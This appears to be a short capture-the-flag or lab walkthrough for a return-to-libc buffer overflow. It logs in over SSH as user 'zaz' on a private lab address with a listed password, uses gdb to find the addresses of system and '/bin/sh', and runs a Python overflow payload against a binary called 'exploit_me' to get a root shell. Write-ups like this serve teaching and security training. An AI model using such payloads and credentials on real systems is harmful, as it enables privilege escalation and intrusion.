------------------------------
        RETURN TO LIBC
------------------------------

********************************************************************
ZAZ'S' PART
********************************************************************

We connect to zaz's' user with ssh
    - ssh zaz@192.168.56.107
    password : 646da671ca01bb5d84dbb5fb2238dc8e

gdb ./exploit_me

We need to find the adress of system and /bin/sh
    p system :$1 = {<text variable, no debug info>} 0xb7e6b060 <system>
    find &system, +9999999, "/bin/sh" = 0xb7f8cc58

Then we need to execute the next command :
    ./exploit_me `python -c 'print("A" * 140 + "\x60\xb0\xe6\xb7" + "AAAA" + "\x58\xcc\xf8\xb7")'`

Got the shell with root